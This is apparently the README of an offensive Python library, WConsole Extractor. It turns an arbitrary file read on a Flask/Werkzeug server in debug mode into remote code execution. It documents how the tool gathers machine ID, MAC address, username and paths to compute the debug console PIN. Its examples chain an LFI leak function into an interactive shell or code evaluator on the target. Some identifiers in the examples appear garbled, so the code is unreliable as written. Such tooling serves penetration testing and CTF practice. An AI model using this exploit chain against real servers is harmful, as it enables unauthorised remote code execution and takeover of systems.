WConsole Extractor is a python library which automatically exploits a Werkzeug development server in debug mode. You just have to write a python function that leaks a file content and you have your shell :)
Welcome to WConsole Extractor ๐
Wconsole Extractor is a library which allows to automatically exploit a flask debug mode server. You just need to write a file leak function, pass it to the class `WConsoleExtractorconstructor and you can access to all the elements related to the debug mode. Moreover, you can call theshellfunction to obtain an interactive shell.
โจ Demo

๐จ Install
From PyPi
Global installation:
<pre><code class="lang-sh">pip3 install wconsole-extractor</code></pre>
Python virtual environment:
<pre><code class="lang-sh">python3 -m venv env source env/bin/activate pip3 install wconsole-extractor
Deactivate environment
deactivate</code></pre>Installation from repository
Global installation:
<pre><code class="lang-sh">git clone https://github.com/Ruulian/wconsole_extractor.git cd wconsole_extractor pip3 install .</code></pre>
Python virtual environment:
<pre><code class="lang-sh">git clone https://github.com/Ruulian/wconsole_extractor.git cd wconsole_extractor python3 -m venv env source env/bin/activate pip3 install .
Deactivate environment
deactivate</code></pre>๐ Documentation
Note: The target operating system must be a Linux distribution.
Prerequisites
In order to use correctly the library, you need to have an arbitrary file read on the target and implement it in python.
You must write a function that takes a filename as parameter and returns the content of the file on the target. If the file is not found, the function should return an empty string.
Available attributes
From WconsoleExtractor` instance, you can access mutiple attributes:
# Target information
extractor.target # Specified target
extractor.base_url # Target base url
extractor.hostname # hostname
Versions
extractor.python_version # Python version
extractor.werkzeug_version # Werkzeug version
Probably public bits
extractor.username # User who launched the application
extractor.flask_path # Flask installation path
extractor.modname # Constant "flask.app"
extractor.class_name # Constant "Flask"
extractor.probablypublicbits # Probably public bits [username, modname, classname, flaskpath]
Private bits
extractor.machine_id # Machine id
extractor.uuidnode # MAC address in decimal
extractor.private_bits # private bits
Post process information
extractor.pin_code # Werkzeug PIN CODE
extractor.token # Werkzeug console token (available in HTML source code)
Functions
extractor.shell() # Get interactive shell
extractor.debugger() # Get interactive code evaluator
Examples
Spawn a Shell
from wconsole_extractor import WConsoleExtractor, info
import requests
def leak_function(filename) -> str: r = requests.get(f"http://localhost:5000/lfi?path={filename}") if r.status_code == 200: return r.text else: return ""
extractor = WConsoleExtractor( target="http://localhost:5000", leakfunction=leakfunction, debuggerpath="/custompath", # Custom debugger path (default: /console) )
info(f"PIN CODE: {extractor.pin_code}") extractor.shell()
Spawn a Code Debugger
from wconsole_extractor import WConsoleExtractor, info import requests
def leak_function(filename) -> str: r = requests.get(f"http://localhost:5000/lfi?path={filename}") if r.status_code == 200: return r.text else: return ""
extractor = WConsoleExtractor( target="http://localhost:5000", leakfunction=leakfunction, debuggerpath="/custompath", # Custom debugger path (default: /console) )
info(f"PIN CODE: {extractor.pin_code}") extractor.debugger()
Author
๐ค Ruulian
- Website: https://ruulian.me
- Twitter: @Ruulian_
๐ค Contributing
Contributions, issues and feature requests are welcome!
Feel free to check issues page.
Show your support
Give a โญ๏ธ if this project helped you!
๐ License
This project is MIT licensed.
This README was generated with โค๏ธ by readme-md-generator_